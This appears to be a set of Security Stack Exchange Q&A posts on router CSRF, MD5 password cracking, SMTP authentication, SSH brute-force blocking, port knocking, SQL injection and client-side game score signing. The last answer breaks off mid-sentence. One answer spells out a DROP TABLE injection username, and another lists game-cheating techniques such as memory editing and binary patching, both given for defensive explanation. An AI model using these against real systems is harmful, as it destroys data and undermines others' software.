145,091 | Yet another serious router vulnerability has been disclosed: https://www.exploit-db.com/exploits/40889/ This is a command execution vulnerability through the web interface. I'm not too concerned about internal users being able to exploit it; I only allow trusted people on my network. However, a major concern is that external web sites could exploit it as a CSRF attack. How can I configure Chrome to prevent external web sites referencing or redirecting to my router? Ideally I'd like to still be able to manually browse to the router admin page, although I guess I can live without that. For FireFox, the NoScript plugin can do this using ABE - Application Boundaries Enforcer. As a workaround I have patched the router and put it on a non-predictable IP address. However, that's only a partial solution as further issues are likely to appear in future, and there are various ways for web pages to access private IP addresses (e.g. WebRTC, Java). | As per PCI, the first 6 (BIN) and the last 4 can be shown, others should be masked: From an official 2008 PDF: PCI Data Storage Do’s and Don’ts : Never store the personal identification number (PIN) or PIN Block. Be
sure to mask PAN whenever it is displayed. The first six and last four
digits are the maximum number of digits that may be displayed. PAN is Primary Account Number So as far as compliance goes, the data terminal used to print the receipt is compliant. | {
"source": [
"https://security.stackexchange.com/questions/145091",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/31625/"
]
} |
145,369 | Apparently Yahoo was hacked yet again with up to a billion user accounts being compromised. The article says Yahoo uses MD5 for password hashing. Are the hackers likely to be able to crack the passwords too?
How long will it take to crack 1 password?
Is the time to crack 1 billion , just 1B * t ? | Yes, they were likely able to crack many of the passwords in a short time. From the official Yahoo statement : For potentially affected accounts, the stolen user account information may have included names, email addresses, telephone numbers, dates of birth, hashed passwords (using MD5) and, in some cases, encrypted or unencrypted security questions and answers. MD5 is a disputable choice for password hashing because its speed makes cracking MD5-hashed passwords really fast . Also, they are likely not salted, since Yahoo would have certainly let us know. (A salt would have helped to prevent the use of rainbow tables while cracking.) You can see the drawbacks of simple MD5 hashing when you compare it with the Ashley Madison breach in 2015 which leaked 36 million accounts. In that case, they used bcrypt with 2 12 key expansion rounds as opposed to Yahoo's plain MD5 which is why back then researchers could only decipher 4,000 passwords in a first attempt. From the article: In Pierce's case, bcrypt limited the speed of his four-GPU cracking rig to a paltry 156 guesses per second.
[...]
Unlike the extremely slow and computationally demanding bcrypt, MD5, SHA1, and a raft of other hashing algorithms were designed to place a minimum of strain on light-weight hardware. That's good for manufacturers of routers, say, and it's even better for crackers. Had Ashley Madison used MD5, for instance, Pierce's server could have completed 11 million 1 guesses per second , a speed that would have allowed him to test all 36 million password hashes in 3.7 years if they were salted and just three seconds if they were unsalted (many sites still do not salt hashes). So, cracking a large portion of the Yahoo passwords is a matter of seconds (while some stronger passwords will remain unbroken). An exact answer would depend on the available computation power and the password security awareness of Yahoo customers. 1 As @grc has noted, 11 million hashes per second appears rather slow. @Morgoroth's linked 8x Nvidia GTX 1080 Hashcat benchmark (200.3 GH/s for MD5 total) is a good resource for more up-to-date measurements. | {
"source": [
"https://security.stackexchange.com/questions/145369",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/25511/"
]
} |
145,395 | During a web application test I have discovered a parameter tampering issue that allows a user to delete comments left by other users. They can't modify the content of other users' comments, and they can only view them where this is intentional. I'm now calculating the CVSS score using this calculator . It's pretty clear that the confidentiality impact is none, but I'm unclear about the others. So my question is: for the purpose of CVSSv3, is unauthorised deletion an integrity issue, or an availability issue (or both) ? | As pointed out in this (unanswered) question , Availability in CVSSv3 is about how well the web service performs, not whether its data is available: While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the impacted component, this metric refers to the loss of availability of the impacted component itself, such as a networked service (e.g., web, database, email). To answer your question: only Integrity is relevant here. | {
"source": [
"https://security.stackexchange.com/questions/145395",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/31625/"
]
} |
145,563 | Sometimes we need to prove that a file was not created in advance - a good example is warrant canaries. The person releasing them may have been forced to sign the file with a future timestamp . For example, AutoCanary uses recent news headlines which is a very secure method, assuming the adversary can't predict future (or obviously manipulate the source of these headlines). Question : What are other secure ways to prove that a file was not created in advance? | If all parties can trust a common randomness beacon (like the NIST Randomness Beacon ), this can be achieved by including a recent block from the beacon into the file along with its timestamp. The recipients then, in addition to verifying the signature, must also verify that the beacon data is authentic and as recent as they require. Other public random values might also do the trick, for example, the winning numbers of a well-publicized lottery. But care needs to be exercised however that the items chosen have sufficient entropy. For example, if you just pick the closing value of the Dow Jones Industrial Average, that's been a 6- or 7-digit value for decades, so an attacker could just force you to precompute signatures for all likely future values of the index. The closing values of a list of stocks that all participants agree on beforehand might do the trick, though I'd want to do some calculations first to convince myself that the list has sufficient entropy. | {
"source": [
"https://security.stackexchange.com/questions/145563",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/109991/"
]
} |
145,664 | I was just wondering how I could build a private network where it is physically impossible to gain access from outside but still have the option to publish data to some remote server. As an example: Let's say I have a network of devices that controls some kind of critical infrastructure and I don't want anyone to be able to access it except for the people on-site. However, I'd still linke to send diagnostic information without notable delay to a remote server that can be accessed from the internet. Assumptions about the attacker: can break into any system that is connected to the internet does not have physical access to the private network So we can't just put a server that acts as a firewall between the public and private network, because every software has flaws and the attacker would gain access to the private network as soon as the firewall has been broken (except if we had a firewall where the rules are embedded in hardware or for some other reason impossible to be modified without physical access. Are there such devices?) What could solve the problem is a device that physically allows only unidirectional communication (in our case from the private to the public network). I don't know if there are any such devices, but I came up with some ideas: use any kind of write-only media, like CD-ROMs. Issues: high latency and requires specialized hardware to automatically move CDs between machines. paper printer/scanner setup: Have a printer in your private network that feeds directly into a scanner that is connected to the public network. Latency reduced to just a few seconds, but error-prone due to OCR. Fiber-optic communication: On the side of the receiver, physically remove the optical transmitter (or remove the receiver on the other side), therefore only unidirectional communication is possible. Probably won't work with Ethernet though (are there any network protocols that properly handle unidirectional communication?) Before I continue to make a fool out of myself because I've missed the obvious solution, I'd love to hear your comments on this :) | You can use a serial port. By default there are two data lines, one per each direction, plus a ground wire (which is irrelevant here). By disconnecting the appropriate line you can prevent communication in a certain direction. It's really easy to use it, at the very basic level I think you can run something like echo hello >> /dev/ttyS0 and receive it with cat /dev/ttyS0 at the other side. There is no complicated network stack to work around (which would prevent unidirectional communications as it would treat the lack of response as packet loss) and most languages have easy to use libraries to talk over serial ports. Here's an example in Python on how to send some JSON over serial: import serial, json
s = serial.Serial('/dev/ttyUSB0')
data = json.dumps({"status": "OK", "uptime": 60}).encode("utf-8") # make UTF-8 encoded JSON
s.write(data + "\n") # send the JSON over serial with a newline at the end | {
"source": [
"https://security.stackexchange.com/questions/145664",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/133753/"
]
} |
145,773 | On a whim I've recently decided to throw up the first proper website I created onto my local web server I use for development. I thought it'd be a great environment to throw some SQL at for injection as I know there are flaws and the site was only really meant for my own personal development. Anyway, to get to the point, after a few attempts the furthest I could get was to have the page return an error with the statement. I was trying to get into a specific test account I set up, (if the result returns more than one account an error's thrown, so I didn't expect selecting every username where 1=1 to work), but every time I got a response as if I had entered a normal, incorrect password. I took a look at the PHP code and turns out I was hashing the password before the query so the attack was being hashed before it could do any harm. Being new to web security as a whole, and having an interest in web development, I was wondering whether there are any vulnerabilities with this method of SQL injection prevention as I expect to have not thought something through. Just to clarify, this isn't meant to be a "look guys I've found something new" as there are plenty more brighter sparks in information security than myself, who would have likely figured this out already, but I'd like to know why this likely isn't suitable as a security mechanism. | So, hashing the user password before entering it into the query is a coincidental security feature to prevent SQL injection, but you can't necessarily do that with all user input. If I'm looking up a Customer by their Name and I have a query like Select * from Customer Where Name like '%userInput%' If I set userInput as a hashed version of what was typed in, it wouldn't work correctly even if Name was also hashed in the database, it would only work for exact search query. So if I had a Customer with Name "Sue" and I typed in a search for "sue", it wouldn't work. I also wouldn't know the name of the customers unless there was an exact match in my search, which isn't practical. The way you want to prevent SQL injection is to not make your queries like above, you'll want to process and parameterize inputs into a query, stripping out things like =s and other symbols that don't make sense in context of the input. A good guide for preventing SQL injection can be found here . | {
"source": [
"https://security.stackexchange.com/questions/145773",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/133845/"
]
} |
145,812 | SSL is meant to protect your website from a man-in-the-middle attack. But if someone is able to do that, couldn't that just request a new certificate from a CA and then modify the traffic sent from the CA to the server (which obviously can't be encrypted) to pass whatever test the CA requires as verification of ownership? | Being able to MitM a certificate authority is perhaps not as trivial as you imagine. You don't know what machine they're using to evaluate ownership, and hopefully they aren't doing this over Starbucks wifi. Certificates apply to domain names , not machines or IP addresses, and thus ownership is generally not verified by testing responses given by a certain HTTP server. For instance, taking a look at Mozilla's requirements for CAs , We consider verification of certificate signing requests to be acceptable if it meets or exceeds the following requirements: all information that is supplied by the certificate subscriber must be verified by using an independent source of information or an alternative communication channel before it is included in the certificate; for a certificate to be used for digitally signing or encrypting email messages, the CA takes reasonable measures to verify that the entity submitting the request controls the email account associated with the email address referenced in the certificate or has been authorized by the email account holder to act on the account holder’s behalf; for a certificate to be used for SSL-enabled servers, the CA takes reasonable measures to verify that the entity submitting the certificate signing request has registered the domain(s) referenced in the certificate or has been authorized by the domain registrant to act on the registrant’s behalf; for certificates to be used for and marked as Extended Validation, the CA complies with Guidelines for the Issuance and Management of Extended Validation Certificates version 1.4 or later. So you would need to either MitM the connection between the CA and a DNS server, or compromise the site's DNS (the more likely one). | {
"source": [
"https://security.stackexchange.com/questions/145812",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
146,050 | So I get the basic idea of (D)DoS used for flooding, but I don't quite understand how this causes servers to crash or get them to slow down due to CPU overuse. As far as I know, the thing that is used to slow down a server is the TCP SYN handshake, but that takes trivial amount of CPU. How does one crash a server using (D)DoS? | How does one crash a server using (D)DoS? To specifically answer your question, to crash a server using only DDoS you need to target the Application Layer (detailed explanation below). These types of attacks specifically attempt to use up as much of the target servers resources a possible and bring it down, rather than just hammer it with network traffic. However, to put this into context alongside other types of DDoS attacks, lets explore their major categories and their uses. This article covers the 3 major attack types for DDoS. From the article: DDoS attacks can be broadly divided into three types: Volume Based Attacks Includes UDP floods, ICMP floods, and other spoofed-packet floods. The attack’s goal is to saturate the bandwidth of the attacked site, and magnitude is measured in bits per second [sic] "(Bps)" [sic]. Protocol Attacks Includes SYN floods, fragmented packet attacks, Ping of Death, Smurf DDoS and more. This type of attack consumes actual server resources, or those of intermediate communication equipment, such as firewalls and load balancers, and is measured in Packets per second. Application Layer Attacks Includes low-and-slow attacks, GET/POST floods, attacks that target Apache, Windows or OpenBSD vulnerabilities and more. Comprised of seemingly legitimate and innocent requests, the goal of these attacks is to crash the web server, and the magnitude is measured in Requests per second. TL;DR - there are multiple types of DDoS attacks depending on what the attacker wants to achieve. Sometimes an attacker will just want to take up all the available bandwidth, other times they will try overwhelm the CPU. It's worth noting that DDoS is just a distributed type of the generic ' Denial of Service ' - it does not imply crashing a server at all, only preventing the server from doing whatever it's intended for, whether thats preventing actual business from taking place by using all bandwidth or otherwise. | {
"source": [
"https://security.stackexchange.com/questions/146050",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/114265/"
]
} |
146,090 | Nowadays there are a lot of hacked websites with stolen login information. In many cases the website states that no credit card data and/or payment information was stolen. Why is that? What I assume is: That both, the database storing the payment data and the one storing user-credentials are separated from each other. So far so good. But what I do not understand: Why shouldn't they be able to find access to the database storing payment information? The latter is still visible/accessible from the outside; that is because users of the website can also view/add/edit their own payment information, e.g. whether they want to use paypal/credit card/IBAN. So the database is obviously accessible from the "outside world". | PCI DSS The major reason for this is a decade long effort by the payment cards industry to limit the extent of such breaches by requiring everyone who handles payment card data to either (a) conform to a set of security practices and (usually) audit requirements, or (b) stop handling payment card data themselves and delegate it to someone who can handle this better. You shouldn't underestimate the second part - while pretty much all sites handle their own user account data, the vast majority of sites (especially smaller ones) that accept credit card payments do not store credit card data in any way whatsoever; if they do want recurring payments without asking CC number every time, they instead store 'just enough' information to show the user (e.g. a partial card number) that this card is "remembered" plus a token issued by their bank/gateway/whatever that enables additional payments from this card to the same merchant - so these tokens are useless to an attacker. While it's not 100% proof and there are many, many cases where PCI DSS is blatantly violated, it does mean a significant reduction in the number of vulnerable companies. | {
"source": [
"https://security.stackexchange.com/questions/146090",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/35367/"
]
} |
146,119 | I'm going to be connecting to one of my servers from my boss' computer (Win 10) using PuTTY. In order to do so, I'll be using my private key. Is there anything I should do before/after to prevent my key from being stolen? My plan was: Install PuTTY add priv_key file to it connect … Uninstall PuTTY remove priv_key | A more secure alternative is to create a new keypair that you use for this purpose. Create the keypair on your boss' computer. Transfer the public key to your own computer. Connect to the server and add the public key. Now your boss' computer can connect to the server. When this is done, you can remove the key on the server. This way, your own key does not leave your computer and your boss' key is only valid a short while. | {
"source": [
"https://security.stackexchange.com/questions/146119",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/108682/"
]
} |
146,219 | I want to pentest websites and services programmed by our company, which is fine as long as we test it on our own infrastructure. What are the (legal) implications when pentesting our services once they have been deployed to other platforms like AWS, Azure etc? Since we technically do not own the target system (we just rented a share of it), would I have to get clearance from the hosters? Obviously their implementation of a hosted service greatly affects security, so I'd like to compare the differences to our own intranet hosting. | In general, you're correct you'll need the permission of the hosting company where you are scanning services deployed on their infrastructure. This is partially so that their Intrusion Detection Systems are aware that it's an authorised scan. Both AWS and Azure have policies detailing the process and what's acceptable to test. The AWS one is here and the Azure one is here . If a hosting company doesn't have a published policy, it's worth contacting them to check. Also it can depend on the exact service that you're using from the cloud hosting provider. So for example for AWS, they allow you to test IAAS style offerings such as AWS EC2 where the customer is responsible for the operating system and not SAAS offerings like AWS S3 where Amazon are responsible for the operating system and associated software. However Azure appears to have a more wide ranging policy where you can test any services you own. Also test types can be restricted, for example DoS testing may well not be allowed as obviously that can have an affect on the cloud provider. For "traditional" hosting it generally depends on the type of service you have. If you're using shared hosting where you just have access to the webroot you may well be restricted from testing, as obviously there's a risk of affecting other users on the same server, however where you have a full OS image (e.g. Digital Ocean Droplets) you tend to be ok as long as you've notified them (in the case of digital Ocean, via a support ticket). There's also a longer list of where to go for different companies here | {
"source": [
"https://security.stackexchange.com/questions/146219",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/133408/"
]
} |
146,371 | I mean, if I am, for example, on Facebook, every packet I send out of my NIC is encrypted. But there must be phase of that packet before it is encrypted. The browser (I think) must create that packet and encrypt it afterwards. So if I am on the machine creating those packets, am I able to see them before encryption? And if yes, are there malware capable of doing this? I think with administrator/root privileges it is certain that it can, but what about without them? | With the availability of browser extensions, actually reading the traffic should be quite doable. If both the malware and web browser run as the same user (and therefore can write to the browser profile directory), then installation of browser extensions can be done relatively easily. You can also open the Web Developer Tools , typically accessible by pressing F12 and visit the Networking tab. That will show you all traffic before it is encrypted and pushed onto the network. The above methods are passive ways that do not interfere with communications. Active methods perform a man in the middle (MitM) attack and actually modify data before it gets forwarded (Tylerl describes an example with Fiddler). | {
"source": [
"https://security.stackexchange.com/questions/146371",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/92184/"
]
} |
146,456 | If the admin is a super user, nothing can prevent them from installing anything on my host, including keystroke logger. Are there any security mechanisms that can protect my account against that? | No, you can't protect yourself against a privileged user. Any piece of software you can install to protect you could be uninstalled or deactivated by the privileged user That's why is told that when a computer is compromised and the attacker gets root access (Or is possible that he did) you just don't control that computer anymore If you don't trust the computer administrator or whoever has access to an administrator account then you shouldn't store any data that you don't want them to access | {
"source": [
"https://security.stackexchange.com/questions/146456",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/134465/"
]
} |
146,524 | Say you have to choose only one among the following authentication types for your own SMTP server: LOGIN, PLAIN CRAM-MD5 DIGEST-MD5 NTLM/SPA/MSN Which one would you recommend for optimal security? PS: The list is the authentification types given in man swaks | With SSL/TLS it's okay to use LOGIN / PLAIN . You should provide SMTP on top of an SSL-encrypted connection. While some schemes from your list (e.g. DIGEST-MD5 ) can keep a password secure even over an untrusted channel, they won't protect users from a man-in-the-middle attacker tampering with their session. (Commonly, email servers wrap SMTP via direct TLS or a connection upgrade with STARTTLS at the ports 465/587.) Any SMTP auth type, regardless if you use PLAIN or an advanced method, just provides application level authentication. But what you want is transport level security . After a user is authenticated over SMTP, there will be no automatically encrypted connection. Per the SMTP protocol, commands and emails are exchanged with the server in plain text, allowing a man-in-the-middle attacker to read and modify the communication and inject new commands. That's why you should provide it on top of SSL encryption, just like HTTPS provides HTTP on top of SSL. The HTTP analogy: If you secure your website with HTTPS, then it doesn't matter that the a login form actually transmits your password as a plain string in the POST body of the HTTP request, because the data transport is SSL-encrypted. Enabling CRAM-MD5 for SMTP is analogous to implementing a challenge-response scheme in Javascript before transmitting login credentials to a website. (You can occasionally see that technique in router interfaces which don't provide HTTPS but it's not very common.) As for a real-life example, GMail is fine with offering LOGIN / PLAIN authentication (where credentials are sent in plan text) after having established a secure SSL connection: $ openssl s_client -starttls smtp -connect smtp.gmail.com:587
...
250 SMTPUTF8
EHLO foo
250-smtp.gmail.com at your service, [127.0.0.1]
250-SIZE 35882577
250-8BITMIME 250-AUTH LOGIN PLAIN XOAUTH2 PLAIN-CLIENTTOKEN OAUTHBEARER XOAUTH 250-ENHANCEDSTATUSCODES
250-PIPELINING
... (As you can see, they also provide some methods you didn't list, e.g. XOAUTH2 for OAuth2 tokens which might be interesting if you're after passwordless authentication.) | {
"source": [
"https://security.stackexchange.com/questions/146524",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/126446/"
]
} |
146,595 | Normal SQL injections are no problem since I always use prepared statements, but how to protect oneself from second order SQL injections ? | A second order SQL injection is an injection where the payload is already stored in the database (instead of say being delivered in a GET parameter). In that sense it is somewhat similar to stored XSS (and ordinary "first order" SQL injection would be analogous to reflected XSS). How does it work? Lets say you let users pick any username. So an attacker could choose the name '; DROP TABLE Users; -- . If you naively concatenate this username into your SQL query to retrieve information about that user you have a problem: sql = "SELECT * FROM Users WHERE UserName = '" + $username + "'"; So, how do you deal with this? Always use parametrized querires, always, always, always. Treat all variables as untrusted user data even if they originate from the database. Just pretend everything is GET parameters, and behave accordingly by binding them as parameters. You can also sanitize and limit the input (e.g. only allow alphanumeric usernames) before it is stored in the database as well as after it is retrieved from the database. But I would not rely on that as my only line of defence, so use parametrized queries as well. | {
"source": [
"https://security.stackexchange.com/questions/146595",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/124007/"
]
} |
146,713 | I'm not a cybersecurity expert but just a webmaster and I wonder if this kind of authentication would be dangerous. I test the password like this on the server side using PHP: if (isset($_POST['pass_word']) AND $_POST['pass_word'] == $passwd) $passwd comes from my PostgreSQL DB. I thought at least I don't risk SQL injection. Do I risk some other kind of injection? If it's a hazardous way to authenticate please explain why. | This looks like you're storing passwords in the clear, which is a bad idea. You should ensure passwords are protected using, at minimum, password_hash() and password_verify() , which use bcrypt under the hood. This is simple, easy, safe, and perfectly acceptable for most scenarios. Alternatively you can use a slightly more secure method such as Argon2 , which won the Password Hashing Competition and is resistant to CPU and GPU cracking, and also aims to minimise the potential for side-channel attacks. There's an article which explains how to use Argon2 as part of libsodium's PHP wrapper, or directly using Paragon's "Halite" library, which offers Argon2 with symmetric encryption on top to prevent database-only access from providing usable hashes, due to the fact that the symmetric key is stored on the server's disk as a file. This option is more complicated, but it does offer some additional security if you're truly paranoid. I'd suggest avoiding this if you're unfamiliar with secure development, though, as the chances of you messing something up are increased. I'd also recommend using === in order to avoid weird cases of false equality using arrays in URL queries or nulls. | {
"source": [
"https://security.stackexchange.com/questions/146713",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/134709/"
]
} |
146,721 | Unavoidable issue of modern cell phones is that they have a front and rear side camera covering almost a 360deg view. And that some applications like, say Facebook request access for everything. So basically a normal user has at least an app that has camera permissions, and even though they intend to use it rarely, there's no info about when it turns on. My question is, is there a way to monitor when do apps that have those permissions actually turn on the camera? (Let's narrow it down to Android) | This looks like you're storing passwords in the clear, which is a bad idea. You should ensure passwords are protected using, at minimum, password_hash() and password_verify() , which use bcrypt under the hood. This is simple, easy, safe, and perfectly acceptable for most scenarios. Alternatively you can use a slightly more secure method such as Argon2 , which won the Password Hashing Competition and is resistant to CPU and GPU cracking, and also aims to minimise the potential for side-channel attacks. There's an article which explains how to use Argon2 as part of libsodium's PHP wrapper, or directly using Paragon's "Halite" library, which offers Argon2 with symmetric encryption on top to prevent database-only access from providing usable hashes, due to the fact that the symmetric key is stored on the server's disk as a file. This option is more complicated, but it does offer some additional security if you're truly paranoid. I'd suggest avoiding this if you're unfamiliar with secure development, though, as the chances of you messing something up are increased. I'd also recommend using === in order to avoid weird cases of false equality using arrays in URL queries or nulls. | {
"source": [
"https://security.stackexchange.com/questions/146721",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/52758/"
]
} |
146,806 | I need to prove that all my pictures were taken before a certain date. Is uploading them to Picassa, Flickr or a similar service a good way to achieve such timestamping? | In general, the problem of Secure Timestamping is actually a complex topic with no single right answer. There are two general approaches: 1) a trusted "Timestamping Authority" keeps logs of when stuff happened and everybody believes them because that's literally their job. 2) Using cryptography in some way. In general the crypto approaches don't work very well and can only prove that photo A was logged before photo B, but not the exact time. There are lots of companies on the market who offer timestamping services based on one of these two approaches. How much you want to trust them depends on how transparent the company is with their practices, and what local law apply. So, for your situation: it sounds like somebody is requiring you to do this (maybe for legal reasons?). You should find out level of trust they need in the timstamping authority. What you have come up with is to use Picassa or Flickr as a trusted Timestamping Authority. Depending on what you need the timestamp for, that might be ok. For example, if it's your friend to win a bet, then the upload time on Picassa or Flickr is probably fine. If this is to prove ownership of multi-billion dollar real estate holdings, then you may want to involve a notary. Basically, ask yourself this question: is the dollar value that you stand to gain or lose greater than what it would cost to hack or bribe Picassa into changing a timestamp? If no then you're fine. If yes, then you need a more official timestamping service. | {
"source": [
"https://security.stackexchange.com/questions/146806",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/134800/"
]
} |
146,837 | Would it possible to appear as though a server doesn't exist? Is it possible to have all requests believe host-name could not be resolved unless a specific phrase was provided in the request? Is there some evidence of a servers existence that could not be hidden by the owner of the server? Would there be any practical added security? | You can set your server to normally drop all incoming packets and only open a port after it gets/sees a set of packets that specify a specific sequence of ports (this is called port knocking). I use this technique with my server; you cannot normally see the server because it drops all incoming packets. Once the port knocking packets reach the server, the server will then accept packets from the 'knocking' address but continue to drop packets from other addresses. Security is better with this method because IP scans and attempted brutes won't be much of an issue to you. In order to hack a server there must be recon, to find out what services are running, what kind of OS you have, etc. By denying an attacker this info, it makes it harder for him to craft his attack for your device. The weakness of this defense is that if an attacker can see the incoming knocking packets, they can then open that port as well. | {
"source": [
"https://security.stackexchange.com/questions/146837",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/91316/"
]
} |
146,899 | I logged onto my VPS this morning to find millions of failed login attempts for the root user and other users that don't even exist. I took the below measures to try and obfuscate the attackers efforts which (have been going on for months). Question(s) Is this an appropriate response? What more can be done? Is there anything valuable I can do with a list of these IPs? System info for a Centos7 vps uname -a
inux vm01 3.10.0-327.22.2.el7.x86_64 #1 SMP Thu Jun 23 17:05:11 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux step 1 Created a script to grab all the IP addresses that failed to login from the secure log. ( /var/log/secure ) # get_ips.sh
grep "Failed password for" /var/log/secure \
| grep -Po "[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+" \
| sort \
| uniq -c step 2 Write a script to create firewall rules to block the ip address that are found from the script in step 1. This script is ip_list_to_rules.sh #!/bin/bash
# ip_list_to_rules.sh
# script to parse output of get_ips.sh and create firewall rules
# to block ssh requests
if [ -z $1 ]; then
echo "arg1 must be path to a list of the form <COUNT> <IP>\n"
exit
fi
LIST=$(readlink -f $1)
SSH_IP=$(echo $SSH_CLIENT | head -n1 | awk '{print $1;}')
echo "Reading IPs from ${LIST}"
echo "SSH Client IP will be ignored (${SSH_IP})"
while read COUNT IP; do
echo "Creating rule for ${IP}"
firewall-cmd --direct --add-rule ipv4 filter INPUT 1 -m tcp --source $IP -p tcp --dport 22 -j REJECT
firewall-cmd --direct --add-rule ipv4 filter INPUT 1 -m tcp --source $IP/24 -p tcp --dport 22 -j REJECT
done<<<"$(cat ${LIST} | grep -v ${SSH_IP})" step 3 Run it all and save rules. ./get_ips.sh > attack_ips.list
./ip_list_to_rules.sh attack_ips.list
firewall-cmd --reload Update Below are the measures I took from the answers. Disabled root logins Changed SSH port Install & configured fail2ban Disable password authentication & enable public key auth I didn't actual do 4 because I usually connect through chrome secure shell client and AFAIK there isn't public key support. | Yes, this is a perfectly reasonable and common approach. However, you've reinvented fail2ban . You probably want to switch to using that instead so you don't have to debug issues with your script and can make use of the existing filters for ssh, apache, and other common services. Unfortunately, there is not terribly much you can do with these IPs. You can try to report the activity to the abuse contact listed for their IP block, but it's not really worth your time unless they do something more serious. You should also do the standard ssh hardening, like disabling password-based and root logins unless you absolutely need them. | {
"source": [
"https://security.stackexchange.com/questions/146899",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/134886/"
]
} |
147,043 | TL;DR I am working on a gaming system that uses UnityScript and C# on the client and PHP on the server. A MD5 hash of the data plus a shared secret is used to check that the data has not been modified in transit. Is MD5 good enough for this? What other hash algorithm could I use that works in all three languages? The Problem In More Detail I have come across some code on a widely used community website about the popular Game Development Platform Unity , and I am now working on improving the MySQL, PHP and security of that code. The code uses a "secret key" value that is shared between the client and the server. All messages from the client includes a hash of the data (e.g. name and score) plus the secret key, that the server checks before accepting the data. This is basically an authentication that the data passed has not been tampered with. However, because it's MD5 I think someone who is listening to the network traffic could easily work out the secret key and then post whatever data they want to the server. So my questions are: Does this current state of affairs warrent improvement? Or is this the intended current use of MD5 (as of January 2017)? Is there another hashing algorithm that could further improve/authenticate this communication activity? Please note that the algorithm would need to work in PHP, UnityScript and C#. The Code In UnityScript (client side): var hash=Md5.Md5Sum(name + score + secretKey); In C# (client side): string hash = MD5Test.Md5Sum(name + score + secretKey); In PHP (server side): $secretKey = "mySecretKey"; // Change this value to match the value
//stored in the client javascript below
$realHash = md5($_GET['name'] . $_GET['score'] . $secretKey);
if($realHash == $hash) {
//interact with database
} Further Criteria Some Unity programmers use UnityScript (a Python-like language with a JavaScript-like syntax on the .NET API) but no library can be assumed to be installed. Game Developers are not PHP / MySQL programmers so complex or 3rd party PHP/C#/Js code would probably not be helpful. BCrypt is apparently unwise to use with C# BCrypt needs a static salt in this instance (perhaps derived from the secret key?) but is intended to work with a random salt. PBKDF2 seems to be prefered over BCrypt but can be very slow particularly on mobile devices without much memory. Dealing with a secured server can not be expected (if only...). I don't know enough about the C# security library to really pick out best options from those listed. While the code outlined is simply to do with highscore updates, this code has been in the past - and will be in the future - taken and used for transporting all sorts of data, public and private to various databases. Dealing with hash algorithm interoperability between PHP, UnityScript, C# is a bigger hurdle than I had anticipated. If it was just PHP I'd use password_hash . Some Thoughts and background to this question: I updated the title as the edited title seemed to suggest that I wasn't sure about changing MD5, whereas knowing I should change MD5 was one of the core reasons of asking the question here in the first place. The original question was that I wanted to update the terrible code suggestions given on (amongst other places) here about how to handle interactions between a game on a client machine and data storage on a remote server. Bare in mind this is code suggestions for beginner programmers in Unity and this site is [now] run by Unity Technologies themselves. If you look, the original question (linked above) was using PHP Mysql_ functions (as well as a rather crappy invalid form of PDO). I felt this would benefit from a rewrite. I saw that the original code had also used an md5 routine to hash the intended data. When it came to the replacement of MD5, I hadn't realised either the vulnerability of compiled project files or the size/scale of the work needed to make this codeblock be actually more secure (on either the interaction with the server or the client side data).
My original quest was to find a suitable drop in replacement for the MD5 which could work in the varous languages required (UnityScript, C#, PHP) , as I was aware of it's shortfalls. I hadn't realised (judging by the comments here) how tediously easy it actually is to break into exe's and grab hardcoded data. This question is NOT about a game I'm making, it is not about My project and the code quoted that I am intending to replace was not written by me . I read a lot of the comments that somehow people are having a go at the messenger, but this question came from my own wish to improve an existing shortcoming on a teaching wiki website.
I do have the greatest respect for the knowledge shared in answering this question but I am aware that from the last 6 months exploring the Unity documentation and learning sites that there is a significant gap in securing both local applications and multiplayer or other remote interactions. I see a lot of responders in comments stating that the answer given by George is a bad answer - but it answers the specific question I asked, at the time.
Thanks. Final Note: This Blob post from comments by Luke Briggs underlined how much of an eye openingly easy process it is to manipulate local Unity Game Application data. I did not at all comprehend how vulnerable local files are.... | This approach is fundamentally flawed. Anything on the client side can and will be tampered with by players. It is the same problem which makes DRM untenable - the user owns the machine and all the data on it, including your executables, data in memory, etc. Keeping algorithms secret doesn't work (see Kerckhoffs's principle ) because it only takes a small amount of reverse engineering work to work out what your code is doing. For example, let's say you've got a routine in your game client which posts the level score up to the server, using some cryptography of whatever form to ensure that it isn't tampered with over the network. There are a whole bunch of ways to get around this: Use a memory editing tool such as Cheat Engine to scan for the current score (pause, search the score, unpause, wait for score to change, search again, repeat until you find the memory address which contains the value) and edit it. When the level completes the score value will be happily treated as legitimate by your code, and uploaded to the server. Modify the game executable on disk so that your "level complete" code ignores the real score value and picks a different one. Modify the game executable on disk so that simple things (e.g. killing one monster) increases your score by 1000x more than it should do. Modify the game executable on disk so that you can never die, or have infinite powerups, or one-hit kills, or any other number of helping things, so that you can easily attain a very high score. Perform any of those modifications in-memory after the game loads so that the original executable stays intact (useful for cases where there are annoying integrity checks) Simply expose the "we finished a level, now upload the score" code externally from the process so that it can be called by anyone's program. In native code you can inject a small stub and add an entry to the export table, or just directly copy the code into your own executable. In .NET it's trivial to just modify the class and method's visibility flags and import it into a new program. Now you can submit whatever score values you like without ever even running the game. Reverse engineer the game and get hold of the "secret" key and write your own app to send the score value to the server. This is just the tip of the iceberg. For more complex games there are all sorts of workarounds to anti-cheat and other problems, but regardless of the defense tricks used there will always be a way to mess with client-side values. The critical feature of a secure approach is that nothing on the player's computer should be trusted . When your server code receives a packet from a player, assume that your game might not even be running - it could be a totally homebrew piece of code that lies about everything. Securing multiplayer games (or any 